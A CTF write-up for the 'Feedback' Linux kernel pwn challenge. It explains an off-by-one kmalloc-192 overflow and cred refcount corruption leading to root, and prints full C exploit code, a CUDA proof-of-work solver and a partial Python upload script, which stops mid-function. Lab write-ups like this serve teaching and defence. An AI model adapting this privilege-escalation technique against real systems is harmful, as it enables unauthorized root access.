Feedback#

CTF: VulnByDefault CTF
Challenge: Feedback (Student Feedback)
Category: Pwn (Linux Kernel)
Flag: VBD{On3_byt3_a_dr3am_w0rk1ng_w1th_p1p3s_316dbee3615588c7efe25ee55cd3c281}

1. Challenge Overview#

The challenge provides a remote Linux VM running a custom kernel module called feedback.ko. Connecting to the server requires solving a hashcash proof-of-work (32-bit SHA1 partial collision) before being granted a shell inside an unprivileged QEMU virtual machine. From there, the goal is to exploit a vulnerability in the kernel module to escalate privileges to root and read the flag from /dev/sda.

Remote endpoint:

1
Host: ctf.vulnbydefault.com
2
Port: <changes each session>

On connect, the server sends a PoW challenge:

1
Send the output of: hashcash -mb32 <random_token>

After solving and submitting the stamp, a minimal Linux system boots:

1
Saving 256 bits of non-creditable seed for next boot
2
Starting syslogd: OK
3
Starting klogd: OK
4
Running sysctl: OK
5
Starting network: OK
6
Starting crond: OK
7

8
-----------------------------
9
Welcome to Student Feedback
10
-----------------------------
11

12
~ $

2. Vulnerability Analysis#

The feedback.ko kernel module exposes an ioctl-based interface with three operations:

FEEDBACK_ADD - allocate a feedback object
FEEDBACK_DEL - free a feedback object
FEEDBACK_GET - read back a feedback object

The bug is a classic off-by-one heap overflow in the add handler:

1
feedback = kmalloc(size, GFP_KERNEL);
2
copy_from_user(feedback, user_feedback, size + 1); // copies size+1 bytes into size-byte allocation

This lets us overflow exactly 1 byte past the end of any heap chunk we allocate. All objects live in the kmalloc-192 slab (size = 0xc0), making the overflow target predictable.

3. Exploit Strategy#

The exploit is leakless and timing-based - it doesn’t require any kernel address leaks. The strategy is:

Stage 1: Edge Finding#

Allocate many feedback objects (IDs 1 through N) in kmalloc-192, each filled with a unique byte and the overflow byte set to 0x04.
After each allocation, scan all previous objects to detect if any had their first byte changed to 0x04 - this means we found an edge pair where object A’s overflow reaches into object V.
Clean up all other objects and reallocate at fixed IDs (a=4002, v=4001) to hold the edge stable.

Stage 2: Credential Corruption#

Free the victim slot (V) so the kernel can reuse it.
The kernel’s credential allocation path (prepare_creds / commit_creds) uses kmalloc-192 for struct cred.
Fork child processes that will have their cred objects land in the freed victim slot.
Use the overflow byte (0x04) from object A to corrupt the low byte of the adjacent cred’s refcount/usage field.
This causes the cred to be freed prematurely while still in use.

Stage 3: Use-After-Free Spray#

Spray execve("/bin/busybox", "ping", "127.0.0.1") across multiple CPUs.
The freed cred slot gets reclaimed by one of the spray processes.
When the cred structure gets reallocated with attacker-controlled timing, uid=0 / euid=0 (root).
The now-root process reads /dev/sda and prints the flag.

Runtime Parameters (Tuples)#

The exploit accepts timing parameters that control the race:

1
/tmp/e <overflow_byte> <spray_count> <ctrl_delay_ms> <spawn_gap_us> <dec_children> <dec_gap_us> <spray_waves> <wave_gap_ms>

Multiple tuples are tried to increase success probability:

1
0x04 220 10 900 3 2000 6 20   (primary)
2
0x04 220 6  900 3 2500 6 20
3
0x04 220 6  900 3 2000 6 20
4
0x04 220 8  900 3 2000 6 20

Embedded Exploit Source#

1
#define _GNU_SOURCE
2
#include <errno.h>
3
#include <fcntl.h>
4
#include <sched.h>
5
#include <stdint.h>
6
#include <stdio.h>
7
#include <stdlib.h>
8
#include <string.h>
9
#include <sys/ioctl.h>
10
#include <sys/types.h>
11
#include <sys/wait.h>
12
#include <unistd.h>
13

14
struct request {
15
    uint64_t id;
16
    uint64_t size;
17
    void *name;
18
    void *feedback;
19
};
20

21
#define FEEDBACK_ADD _IOWR('s', 0, struct request)
22
#define FEEDBACK_DEL _IOWR('s', 1, struct request)
23
#define FEEDBACK_GET _IOWR('s', 2, struct request)
24

25
static const uint64_t CHUNK_SZ = 0xc0;
26
static const unsigned char EDGE_MARK = 0x04;
27
static int g_fd = -1;
28

29
static void pin_cpu(int cpu) {
30
    cpu_set_t set;
31
    CPU_ZERO(&set);
32
    CPU_SET(cpu, &set);
33
    (void)sched_setaffinity(0, sizeof(set), &set);
34
}
35

36
static int xio(unsigned long cmd, struct request *req) {
37
    int ret = ioctl(g_fd, cmd, req);
38
    return (ret < 0) ? -errno : ret;
39
}
40

41
static int add_obj(uint64_t id, unsigned char fill, unsigned char over) {
42
    char *name = calloc(1, 0x100);
43
    char *data = calloc(1, CHUNK_SZ + 1);
44
    if (!name || !data) {
45
        free(name);
46
        free(data);
47
        return -1;
48
    }
49
    memset(name, 'N', 0xff);
50
    memset(data, fill, CHUNK_SZ);
51
    data[CHUNK_SZ] = (char)over;
52
    struct request req = {.id = id, .size = CHUNK_SZ, .name = name, .feedback = data};
53
    int ret = xio(FEEDBACK_ADD, &req);
54
    free(name);
55
    free(data);
56
    return ret;
57
}
58

59
static int del_obj(uint64_t id) {
60
    struct request req = {.id = id};
61
    return xio(FEEDBACK_DEL, &req);
62
}
63

64
static int get_first(uint64_t id, unsigned char *b) {
65
    unsigned char *buf = calloc(1, CHUNK_SZ + 1);
66
    if (!buf) {
67
        return -1;
68
    }
69
    struct request req = {.id = id, .feedback = buf};
70
    int ret = xio(FEEDBACK_GET, &req);
71
    if (ret >= 0) {
72
        *b = buf[0];
73
    }
74
    free(buf);
75
    return ret;
76
}
77

78
static int find_edge_and_clean(int *out_a, int *out_v, int max_ids) {
79
    unsigned char expected[5000];
80
    unsigned char active[5000];
81
    memset(expected, 0, sizeof(expected));
82
    memset(active, 0, sizeof(active));
83

84
    int a = -1, v = -1, max_used = -1;
85
    for (int i = 1; i <= max_ids; i++) {
86
        unsigned char fill = (unsigned char)('A' + (i % 26));
87
        if (add_obj((uint64_t)i, fill, EDGE_MARK) < 0) {
88
            return -1;
89
        }
90
        expected[i] = fill;
91
        active[i] = 1;
92

93
        for (int j = 1; j < i; j++) {
94
            if (!active[j]) {
95
                continue;
96
            }
97
            unsigned char now = 0;
98
            if (get_first((uint64_t)j, &now) < 0) {
99
                continue;
100
            }
101
            if (now != expected[j]) {
102
                if (now == EDGE_MARK && expected[j] != EDGE_MARK) {
103
                    a = i;
104
                    v = j;
105
                    max_used = i;
106
                    goto found;
107
                }
108
                expected[j] = now;
109
            }
110
        }
111
    }
112
    for (int i = 1; i <= max_ids; i++) {
113
        (void)del_obj((uint64_t)i);
114
    }
115
    return -1;
116

117
found:
118
    for (int i = 1; i <= max_used; i++) {
119
        if (i == a || i == v) {
120
            continue;
121
        }
122
        (void)del_obj((uint64_t)i);
123
    }
124

125
    if (del_obj((uint64_t)a) < 0 || del_obj((uint64_t)v) < 0) {
126
        return -1;
127
    }
128

129
    const int rv = 4001;
130
    const int ra = 4002;
131
    if (add_obj((uint64_t)rv, 'X', 0x00) < 0) {
132
        return -1;
133
    }
134
    if (add_obj((uint64_t)ra, 'Y', EDGE_MARK) < 0) {
135
        (void)del_obj((uint64_t)rv);
136
        return -1;
137
    }
138

139
    unsigned char chk = 0;
140
    if (get_first((uint64_t)rv, &chk) < 0 || chk != EDGE_MARK) {
141
        (void)del_obj((uint64_t)ra);
142
        (void)del_obj((uint64_t)rv);
143
        return -1;
144
    }
145

146
    *out_a = ra;
147
    *out_v = rv;
148
    return 0;
149
}
150

151
static int read_flag_device(void) {
152
    int fd = open("/dev/sda", O_RDONLY);
153
    if (fd < 0) {
154
        return -1;
155
    }
156
    char buf[0x400];
157
    ssize_t n = read(fd, buf, sizeof(buf));
158
    close(fd);
159
    if (n <= 0) {
160
        return -1;
161
    }
162
    write(1, "\n[+] /dev/sda dump:\n", 19);
163
    write(1, buf, (size_t)n);
164
    write(1, "\n", 1);
165
    return 0;
166
}
167

168
static void exec_root_ping_on_cpu(int cpu) {
169
    pin_cpu(cpu % 4);
170
    int dn = open("/tmp/.spray_sink", O_WRONLY | O_CREAT | O_APPEND, 0600);
171
    if (dn >= 0) {
172
        dup2(dn, 1);
173
        dup2(dn, 2);
174
        close(dn);
175
    }
176
    execl("/bin/busybox", "busybox", "ping", "127.0.0.1", NULL);
177
    _exit(127);
178
}
179

180
static int controller_main(void) {
181
    pin_cpu(0);
182

183
    int fd = -1;
184
    int delay_ms = 8;
185
    int nping = 220;
186
    int spawn_us = 900;
187
    int waves = 6;
188
    int wave_gap_ms = 20;
189
    const char *s;
190

191
    s = getenv("CTL_FD");
192
    if (!s) {
193
        return 1;
194
    }
195
    fd = atoi(s);
196

197
    s = getenv("CTL_DELAY");
198
    if (s) {
199
        delay_ms = atoi(s);
200
    }
201
    s = getenv("PINGN");
202
    if (s) {
203
        nping = atoi(s);
204
    }
205
    s = getenv("SPAWN_US");
206
    if (s) {
207
        spawn_us = atoi(s);
208
    }
209
    s = getenv("WAVES");
210
    if (s) {
211
        waves = atoi(s);
212
    }
213
    s = getenv("WAVEGAP");
214
    if (s) {
215
        wave_gap_ms = atoi(s);
216
    }
217

218
    if (delay_ms < 0) {
219
        delay_ms = 0;
220
    }
221
    if (nping < 1) {
222
        nping = 1;
223
    }
224
    if (nping > 350) {
225
        nping = 350;
226
    }
227
    if (spawn_us < 200) {
228
        spawn_us = 200;
229
    }
230
    if (waves < 1) {
231
        waves = 1;
232
    }
233
    if (waves > 16) {
234
        waves = 16;
235
    }
236
    if (wave_gap_ms < 0) {
237
        wave_gap_ms = 0;
238
    }
239
    if (wave_gap_ms > 200) {
240
        wave_gap_ms = 200;
241
    }
242

243
    char c = 0;
244
    if (read(fd, &c, 1) <= 0) {
245
        _exit(1);
246
    }
247
    close(fd);
248

249
    usleep((useconds_t)delay_ms * 1000);
250

251
    int base = nping / waves;
252
    int extra = nping % waves;
253
    for (int w = 0; w < waves; w++) {
254
        int cnt = base + ((w < extra) ? 1 : 0);
255
        for (int i = 0; i < cnt; i++) {
256
            pid_t p = fork();
257
            if (p == 0) {
258
                exec_root_ping_on_cpu(0);
259
            }
260
            usleep((useconds_t)spawn_us);
261
        }
262
        if (w + 1 < waves && wave_gap_ms > 0) {
263
            usleep((useconds_t)wave_gap_ms * 1000);
264
        }
265
    }
266

267
    for (;;) {
268
        sleep(1000);
269
    }
270
}
271

272
static int stage2_main(void) {
273
    const char *fd_s = getenv("FBFD");
274
    const char *over_s = getenv("OVERB");
275
    const char *aid_s = getenv("AID");
276
    const char *dec_s = getenv("DECN");
277
    const char *decgap_s = getenv("DECGAP");
278
    unsigned char over_b = 0x06;
279
    int a_id = -1;
280
    int ndec = 5;
281
    int dec_gap_us = 0;
282

283
    if (!fd_s || !aid_s) {
284
        puts("[-] stage2 missing env");
285
        return 1;
286
    }
287
    if (over_s) {
288
        over_b = (unsigned char)strtoul(over_s, NULL, 0);
289
    }
290
    if (dec_s) {
291
        ndec = atoi(dec_s);
292
    }
293
    if (decgap_s) {
294
        dec_gap_us = atoi(decgap_s);
295
    }
296
    if (ndec < 1) {
297
        ndec = 1;
298
    }
299
    if (ndec > 16) {
300
        ndec = 16;
301
    }
302
    if (dec_gap_us < 0) {
303
        dec_gap_us = 0;
304
    }
305
    if (dec_gap_us > 50000) {
306
        dec_gap_us = 50000;
307
    }
308

309
    pin_cpu(0);
310
    g_fd = atoi(fd_s);
311
    a_id = atoi(aid_s);
312
    printf("[*] stage2 uid=%d euid=%d over=0x%02x a_id=%d dec=%d decgap=%d\n",
313
           getuid(), geteuid(), over_b, a_id, ndec, dec_gap_us);
314

315
    int dec_go[16][2];
316
    memset(dec_go, 0, sizeof(dec_go));
317
    for (int i = 0; i < ndec; i++) {
318
        if (pipe(dec_go[i]) < 0) {
319
            puts("[-] dec pipe failed");
320
            return 1;
321
        }
322
        pid_t c = fork();
323
        if (c == 0) {
324
            close(dec_go[i][1]);
325
            char b = 0;
326
            if (read(dec_go[i][0], &b, 1) <= 0) {
327
                _exit(1);
328
            }
329
            close(dec_go[i][0]);
330
            pin_cpu(0);
331
            _exit(0);
332
        }
333
        close(dec_go[i][0]);
334
    }
335

336
    int ctl_go[2];
337
    if (pipe(ctl_go) < 0) {
338
        puts("[-] ctl pipe failed");
339
        return 1;
340
    }
341

342
    char ctl_fd_buf[32];
343
    snprintf(ctl_fd_buf, sizeof(ctl_fd_buf), "%d", ctl_go[0]);
344
    pid_t ctl = fork();
345
    if (ctl == 0) {
346
        close(ctl_go[1]);
347
        setenv("STAGE_CTRL", "1", 1);
348
        setenv("CTL_FD", ctl_fd_buf, 1);
349
        unsetenv("STAGE2");
350
        execl("/proc/self/exe", "exploit", NULL);
351
        _exit(127);
352
    }
353
    if (ctl < 0) {
354
        puts("[-] fork controller failed");
355
        return 1;
356
    }
357

358
    close(ctl_go[0]);
359

360
    if (del_obj((uint64_t)a_id) < 0) {
361
        puts("[-] stage2 failed to free A");
362
        return 1;
363
    }
364
    if (add_obj(100001, 'A', over_b) < 0) {
365
        puts("[-] stage2 attacker add failed");
366
        return 1;
367
    }
368

369
    if (write(ctl_go[1], "C", 1) != 1) {
370
        puts("[-] stage2 ctl signal failed");
371
        return 1;
372
    }
373

374
    for (int i = 0; i < ndec; i++) {
375
        (void)write(dec_go[i][1], "D", 1);
376
        close(dec_go[i][1]);
377
        if (dec_gap_us > 0 && i + 1 < ndec) {
378
            usleep((useconds_t)dec_gap_us);
379
        }
380
    }
381

382
    for (volatile unsigned long warm = 0; warm < 60000000UL; warm++) {
383
    }
384

385
    for (int attempt = 0; attempt < 500; attempt++) {
386
        if (read_flag_device() == 0) {
387
            for (;;) {
388
                sleep(1000);
389
            }
390
        }
391
        for (volatile unsigned long spin = 0; spin < 4000000UL; spin++) {
392
        }
393
    }
394

395
    for (;;) {
396
        sleep(1000);
397
    }
398
}
399

400
int main(int argc, char **argv) {
401
    const char *ctrl = getenv("STAGE_CTRL");
402
    if (ctrl && !strcmp(ctrl, "1")) {
403
        return controller_main();
404
    }
405

406
    const char *st = getenv("STAGE2");
407
    if (st && !strcmp(st, "1")) {
408
        return stage2_main();
409
    }
410

411
    unsigned char over_b = 0x06;
412
    int nping = 220;
413
    int cdelay = 6;
414
    int spawn_us = 900;
415
    int ndec = 5;
416
    int dec_gap_us = 0;
417
    int waves = 6;
418
    int wave_gap_ms = 20;
419

420
    if (argc > 1) {
421
        over_b = (unsigned char)strtoul(argv[1], NULL, 0);
422
    }
423
    if (argc > 2) {
424
        nping = atoi(argv[2]);
425
    }
426
    if (argc > 3) {
427
        cdelay = atoi(argv[3]);
428
    }
429
    if (argc > 4) {
430
        spawn_us = atoi(argv[4]);
431
    }
432
    if (argc > 5) {
433
        ndec = atoi(argv[5]);
434
    }
435
    if (argc > 6) {
436
        dec_gap_us = atoi(argv[6]);
437
    }
438
    if (argc > 7) {
439
        waves = atoi(argv[7]);
440
    }
441
    if (argc > 8) {
442
        wave_gap_ms = atoi(argv[8]);
443
    }
444

445
    pin_cpu(0);
446
    printf("[*] stage1 uid=%d euid=%d over=0x%02x ping=%d cdelay=%d spawn_us=%d dec=%d decgap=%d waves=%d wavegap=%d\n",
447
           (int)getuid(), (int)geteuid(), over_b, nping, cdelay, spawn_us, ndec, dec_gap_us, waves, wave_gap_ms);
448

449
    g_fd = open("/dev/feedback", O_RDWR);
450
    if (g_fd < 0) {
451
        perror("open /dev/feedback");
452
        return 1;
453
    }
454

455
    int a = -1, v = -1;
456
    if (find_edge_and_clean(&a, &v, 900) < 0 &&
457
        find_edge_and_clean(&a, &v, 1400) < 0) {
458
        puts("[-] stage1 no edge found");
459
        return 1;
460
    }
461
    printf("[*] stage1 edge a=%d -> v=%d (cleaned)\n", a, v);
462

463
    if (del_obj((uint64_t)v) < 0) {
464
        puts("[-] stage1 free V failed");
465
        return 1;
466
    }
467

468
    char fd_buf[32], over_buf[16], aid_buf[16], ping_buf[16], delay_buf[16], spawn_buf[16], dec_buf[16], decgap_buf[16], waves_buf[16], wavegap_buf[16];
469
    snprintf(fd_buf, sizeof(fd_buf), "%d", g_fd);
470
    snprintf(over_buf, sizeof(over_buf), "0x%02x", over_b);
471
    snprintf(aid_buf, sizeof(aid_buf), "%d", a);
472
    snprintf(ping_buf, sizeof(ping_buf), "%d", nping);
473
    snprintf(delay_buf, sizeof(delay_buf), "%d", cdelay);
474
    snprintf(spawn_buf, sizeof(spawn_buf), "%d", spawn_us);
475
    snprintf(dec_buf, sizeof(dec_buf), "%d", ndec);
476
    snprintf(decgap_buf, sizeof(decgap_buf), "%d", dec_gap_us);
477
    snprintf(waves_buf, sizeof(waves_buf), "%d", waves);
478
    snprintf(wavegap_buf, sizeof(wavegap_buf), "%d", wave_gap_ms);
479

480
    setenv("STAGE2", "1", 1);
481
    setenv("FBFD", fd_buf, 1);
482
    setenv("OVERB", over_buf, 1);
483
    setenv("AID", aid_buf, 1);
484
    setenv("PINGN", ping_buf, 1);
485
    setenv("CTL_DELAY", delay_buf, 1);
486
    setenv("SPAWN_US", spawn_buf, 1);
487
    setenv("DECN", dec_buf, 1);
488
    setenv("DECGAP", decgap_buf, 1);
489
    setenv("WAVES", waves_buf, 1);
490
    setenv("WAVEGAP", wavegap_buf, 1);
491
    unsetenv("STAGE_CTRL");
492
    unsetenv("CTL_FD");
493

494
    execl("/proc/self/exe", "exploit", NULL);
495
    perror("execl");
496
    return 1;
497
}

4. The PoW Problem and GPU Solution#

The server requires a 32-bit hashcash proof-of-work before granting access. Solving this on CPU takes too long (minutes to hours), so I used a GPU-assisted approach.

Solution: Use Google Colab’s free GPU (NVIDIA T4) to brute-force the hashcash stamp via a custom CUDA kernel.

The CUDA solver implements SHA1 hashing on the GPU:

Each GPU thread tries a different nonce suffix.
65535 blocks x 1024 threads = ~67 million hashes per kernel launch.
On a T4 GPU, this finds a 32-bit collision in seconds.

Google Colab CUDA Solver (`colab gpu.py`)#

This script is meant to run entirely in a Google Colab cell. It:

Asks the user to paste the PoW challenge line from the server
Compiles a CUDA solver with nvcc
Runs it on the Colab GPU
Outputs the solved stamp for copy-paste back to the local terminal

1
#!/usr/bin/env python3
2
"""
3
=================================================================
4
 STANDALONE CUDA HASHCASH POW SOLVER FOR GOOGLE COLAB
5
=================================================================
6
This script asks you to enter the POW challenge from the server,
7
then compiles and runs a GPU-accelerated solver.
8

9
USAGE IN GOOGLE COLAB:
10
1. Run this entire script in a code cell
11
2. When prompted, paste the POW challenge line from server
12
   Example: hashcash -mb26 1fe36e63f5f0cdfd
13
3. Copy the output stamp and paste it back to your local terminal
14

15
=================================================================
16
"""
17
import subprocess
18
import re
19
import sys
20

21
# ==========================================
22
# STEP 1: Get POW Challenge from User
23
# ==========================================
24
print("=" * 70)
25
print("  CUDA HASHCASH POW SOLVER - Google Colab Edition")
26
print("=" * 70)
27
print()
28
print("Paste the POW challenge line from the server below:")
29
print("   Example: hashcash -mb26 1fe36e63f5f0cdfd")
30
print()
31

32
try:
33
    pow_line = input("POW Challenge: ").strip()
34
except (EOFError, KeyboardInterrupt):
35
    print("\nNo input received. Exiting.")
36
    sys.exit(1)
37

38
# Parse the challenge
39
m = re.search(r'hashcash\s+-mb(\d+)\s+(\S+)', pow_line)
40
if not m:
41
    print(f"\nInvalid POW format. Got: {pow_line}")
42
    print("   Expected format: hashcash -mb<BITS> <TOKEN>")
43
    sys.exit(1)
44

45
bits = m.group(1)
46
token = m.group(2)
47

48
print()
49
print(f"Parsed POW Challenge:")
50
print(f"   Bits: {bits}")
51
print(f"   Token: {token}")
52
print()
53

54
# ==========================================
55
# STEP 2: Compile CUDA Solver
56
# ==========================================
57
CUDA_SOLVER_CODE = r"""
58
#include <stdio.h>
59
#include <stdint.h>
60
#include <string.h>
61
#include <time.h>
62

63
__device__ uint32_t rol(uint32_t val, int bits) {
64
    return (val << bits) | (val >> (32 - bits));
65
}
66

67
__device__ void sha1_block(uint32_t* h, const uint8_t* block) {
68
    uint32_t w[16];
69

70
    #pragma unroll
71
    for (int i = 0; i < 16; i++) {
72
        w[i] = (block[i*4] << 24) | (block[i*4+1] << 16) | (block[i*4+2] << 8) | block[i*4+3];
73
    }
74

75
    uint32_t a = h[0], b = h[1], c = h[2], d = h[3], e = h[4];
76

77
    #pragma unroll
78
    for (int i = 0; i < 80; i++) {
79
        uint32_t f, k, temp_w;
80
        if (i < 20)      { f = (b & c) | ((~b) & d); k = 0x5A827999; }
81
        else if (i < 40) { f = b ^ c ^ d;            k = 0x6ED9EBA1; }
82
        else if (i < 60) { f = (b & c) | (b & d) | (c & d); k = 0x8F1BBCDC; }
83
        else             { f = b ^ c ^ d;            k = 0xCA62C1D6; }
84

85
        if (i < 16) {
86
            temp_w = w[i];
87
        } else {
88
            temp_w = rol(w[(i-3)&15] ^ w[(i-8)&15] ^ w[(i-14)&15] ^ w[(i-16)&15], 1);
89
            w[i&15] = temp_w;
90
        }
91

92
        uint32_t temp = rol(a, 5) + f + e + k + temp_w;
93
        e = d; d = c; c = rol(b, 30); b = a; a = temp;
94
    }
95

96
    h[0] += a; h[1] += b; h[2] += c; h[3] += d; h[4] += e;
97
}
98

99
__global__ void hashcash_kernel(int bits, const char* prefix, int prefix_len,
100
                                 uint64_t* found_counter, int* success_flag, uint64_t offset) {
101
    uint64_t tid = offset + ((uint64_t)blockIdx.x * blockDim.x + threadIdx.x);
102
    if (*success_flag) return;
103

104
    uint8_t buffer[64];
105
    for(int i = 0; i < prefix_len; i++) buffer[i] = prefix[i];
106

107
    char hex_chars[] = "0123456789abcdef";
108
    uint64_t temp_tid = tid;
109
    int suffix_len = 0;
110
    char suffix[16];
111

112
    if (temp_tid == 0) {
113
        suffix[0] = '0';
114
        suffix_len = 1;
115
    } else {
116
        while(temp_tid > 0) {
117
            suffix[suffix_len++] = hex_chars[temp_tid % 16];
118
            temp_tid /= 16;
119
        }
120
    }
121

122
    for(int i = 0; i < suffix_len; i++) {
123
        buffer[prefix_len + i] = suffix[suffix_len - 1 - i];
124
    }
125

126
    int total_len = prefix_len + suffix_len;
127
    buffer[total_len] = 0x80;
128
    for (int i = total_len + 1; i < 62; i++) {
129
        buffer[i] = 0;
130
    }
131

132
    uint64_t bit_len = total_len * 8;
133
    buffer[63] = bit_len & 0xFF;
134
    buffer[62] = (bit_len >> 8) & 0xFF;
135

136
    uint32_t h[5] = { 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0 };
137
    sha1_block(h, buffer);
138

139
    int zero_bits = 0;
140
    for (int i = 0; i < 5; i++) {
141
        uint32_t val = h[i];
142
        if (val == 0) {
143
            zero_bits += 32;
144
        } else {
145
            for (int k = 31; k >= 0; k--) {
146
                if ((val >> k) & 1) break;
147
                zero_bits++;
148
            }
149
            break;
150
        }
151
    }
152

153
    if (zero_bits >= bits) {
154
        if (atomicCAS(success_flag, 0, 1) == 0) {
155
            *found_counter = tid;
156
        }
157
    }
158
}
159

160
int main(int argc, char** argv) {
161
    if (argc < 3) return 1;
162
    int bits = atoi(argv[1]);
163
    const char* resource = argv[2];
164

165
    char host_prefix[256];
166
    time_t t = time(NULL);
167
    struct tm tm_utc;
168
    gmtime_r(&t, &tm_utc);
169
    char date[16];
170
    strftime(date, sizeof(date), "%y%m%d", &tm_utc);
171
    srand(time(NULL));
172

173
    snprintf(host_prefix, sizeof(host_prefix), "1:%d:%s:%s::gX%04d:",
174
             bits, date, resource, rand() % 10000);
175
    int prefix_len = strlen(host_prefix);
176

177
    char *d_prefix;
178
    cudaMalloc((void**)&d_prefix, prefix_len + 1);
179
    cudaMemcpy(d_prefix, host_prefix, prefix_len + 1, cudaMemcpyHostToDevice);
180

181
    uint64_t *d_found_counter;
182
    int *d_success_flag;
183
    cudaMalloc(&d_found_counter, sizeof(uint64_t));
184
    cudaMalloc(&d_success_flag, sizeof(int));
185

186
    int initial_flag = 0;
187
    cudaMemcpy(d_success_flag, &initial_flag, sizeof(int), cudaMemcpyHostToDevice);
188

189
    int threadsPerBlock = 1024;
190
    int blocksPerGrid = 65535;
191
    uint64_t offset = 0;
192
    int loops = 0;
193

194
    while(initial_flag == 0) {
195
        hashcash_kernel<<<blocksPerGrid, threadsPerBlock>>>(
196
            bits, d_prefix, prefix_len, d_found_counter, d_success_flag, offset);
197

198
        cudaError_t err = cudaGetLastError();
199
        if (err != cudaSuccess) {
200
            printf("[-] FATAL GPU ERROR: %s\n", cudaGetErrorString(err));
201
            return 1;
202
        }
203

204
        cudaDeviceSynchronize();
205
        cudaMemcpy(&initial_flag, d_success_flag, sizeof(int), cudaMemcpyDeviceToHost);
206
        offset += ((uint64_t)blocksPerGrid * threadsPerBlock);
207
        loops++;
208

209
        if (loops % 10 == 0) {
210
            printf("[GPU] Checked %llu million hashes...\n",
211
                   (unsigned long long)(offset / 1000000));
212
            fflush(stdout);
213
        }
214
    }
215

216
    uint64_t result_counter;
217
    cudaMemcpy(&result_counter, d_found_counter, sizeof(uint64_t), cudaMemcpyDeviceToHost);
218

219
    printf("\n[SUCCESS] %s%llx\n", host_prefix, (unsigned long long)result_counter);
220

221
    cudaFree(d_prefix);
222
    cudaFree(d_found_counter);
223
    cudaFree(d_success_flag);
224
    return 0;
225
}
226
"""
227

228
with open("cuda_solver.cu", "w") as f:
229
    f.write(CUDA_SOLVER_CODE)
230

231
print("Compiling CUDA solver with nvcc...")
232
result = subprocess.run(["nvcc", "-O3", "cuda_solver.cu", "-o", "cuda_pow_solver"],
233
                       capture_output=True, text=True)
234
if result.returncode != 0:
235
    print(f"Compilation failed:\n{result.stderr}")
236
    sys.exit(1)
237

238
print("CUDA Solver compiled successfully!")
239
print()
240

241
# ==========================================
242
# STEP 3: Run the Solver
243
# ==========================================
244
print("Running GPU solver...")
245
print("=" * 70)
246

247
process = subprocess.Popen(
248
    ["./cuda_pow_solver", bits, token],
249
    stdout=subprocess.PIPE,
250
    stderr=subprocess.STDOUT,
251
    text=True
252
)
253

254
stamp_result = None
255
for line in process.stdout:
256
    print(line, end="", flush=True)
257
    if line.startswith("[SUCCESS]"):
258
        stamp_result = line.replace("[SUCCESS]", "").strip()
259

260
process.wait()
261

262
print("=" * 70)
263
print()
264

265
if stamp_result:
266
    print("POW SOLVED!")
267
    print()
268
    print("COPY THIS STAMP AND PASTE IT IN YOUR LOCAL TERMINAL:")
269
    print()
270
    print("=" * 70)
271
    print(stamp_result)
272
    print("=" * 70)
273
    print()
274
else:
275
    print("Failed to find valid stamp")
276
    sys.exit(1)

5. Remote Solver Script (`remote_manual_pow.py`)#

This is the script used during the solve. It:

Asks the user to enter the port number (changes each session)
Displays the PoW challenge for the user to copy to Google Colab
Waits for the user to paste the solved stamp back

It then connects, uploads the compiled exploit via base64, runs multiple parameter tuples, and checks for the flag.

1
import base64
2
import os
3
import re
4
import select
5
import socket
6
import sys
7
import textwrap
8
import time
9

10
PROMPTS = [b"~ $ ", b"/ # ", b"# "]
11
FLAG_RE = re.compile(rb"VBD\{[^}\r\n]+\}")
12

13

14
def has_prompt(buf: bytes) -> bool:
15
    return any(p in buf for p in PROMPTS)
16

17

18
def recv_until(sock: socket.socket, timeout: float, *, want_prompt=False):
19
    deadline = time.time() + timeout
20
    buf = b""
21
    while time.time() < deadline:
22
        r, _, _ = select.select([sock], [], [], 0.25)
23
        if not r:
24
            continue
25
        chunk = sock.recv(4096)
26
        if not chunk:
27
            return buf, "eof"
28
        buf += chunk
29

30
        if FLAG_RE.search(buf):
31
            return buf, "flag"
32
        if b"Wrong Proof of Work" in buf:
33
            return buf, "pow_wrong"
34
        if b"Failed to get \"write\" lock" in buf:
35
            return buf, "busy"
36
        if b"gdbstub: couldn't create chardev" in buf:
37
            return buf, "busy"
38
        if b"Kernel panic" in buf:
39
            return buf, "panic"
40
        if want_prompt and has_prompt(buf):
41
            return buf, "prompt"
42

43
    return buf, "timeout"
44

45

46
def read_pow_line(sock: socket.socket, timeout: float):
47
    deadline = time.time() + timeout
48
    buf = b""
49
    while time.time() < deadline:
50
        r, _, _ = select.select([sock], [], [], 0.25)
51
        if not r:
52
            continue
53
        chunk = sock.recv(4096)
54
        if not chunk:
55
            break
56
        buf += chunk
57
        if b"\n" in buf:
58
            line = buf.split(b"\n", 1)[0].decode(errors="ignore").strip()
59
            return line
60
    return ""
61

62

63
def connect_and_pow(host: str, port: int):
64
    sock = socket.create_connection((host, port), timeout=10)
65
    sock.setblocking(False)
66

67
    line = read_pow_line(sock, timeout=20)
68
    if not line:
69
        sock.close()
70
        raise RuntimeError("failed to read PoW line")
71

72
    m = re.search(r"hashcash -mb(\d+)\s+(\S+)", line)
73
    if not m:
74
        sock.close()
75
        raise RuntimeError(f"unexpected banner: {line!r}")
76

77
    bits = int(m.group(1))
78
    resource = m.group(2)
79
    print(f"[pow] bits={bits} resource={resource}")
80
    print(f"[pow] challenge: {line}")
81
    print()
82
    print(">>> Solve this in Google Colab, then paste the stamp below <<<")
83
    print()
84
    stamp = input("Stamp: ").strip()
85
    if not stamp:
86
        sock.close()
87
        raise RuntimeError("empty stamp")
88

89
    sock.sendall((stamp + "\n").encode())
90

91
    boot, state = recv_until(sock, 240, want_prompt=True)
92
    if state == "pow_wrong":
93
        sock.close()
94
        raise RuntimeError("PoW rejected")
95
    if state == "busy":
96
        sock.close()
97
        raise RuntimeError("remote busy (qemu lock)")
98
    if state in ("prompt", "flag"):
99
        return sock, boot
100

101
    sock.close()
102
    raise RuntimeError(f"failed to reach prompt (state={state})")
103

104

105
def send_line(sock: socket.socket, line: str):
106
    sock.sendall(line.encode() + b"\n")
107

108

109
def upload_exploit(sock: socket.socket, local_path: str):
110
    raw = open(local_path, "rb").read()
111
    b64 = base64.b64encode(raw).decode()
112
    wrapped = textwrap.fill(b64, width=512)
113

114
    payload = "cat > /tmp/e.b64 <<'EOF'\n" + wrapped + "\nEOF\n"
115
    sock.sendall(payload.encode())
116
    out, state = recv_until(sock, 120, want_prompt=True)
117
    if state != "prompt":
118
        return out, state
119

120
    send_line(sock, "base64 -d /tmp/e.b64 > /tmp/e && chmod +x /tmp/e && rm -f /tmp/e.b64")
121
    out2, state2 = recv_until(sock, 60, want_prompt=True)
122
    return out + out2, state2
123

124

125
def attempt_on_connection(sock: socket.socket, tuples, max_attempts: int):
126
    all_out = b""
127
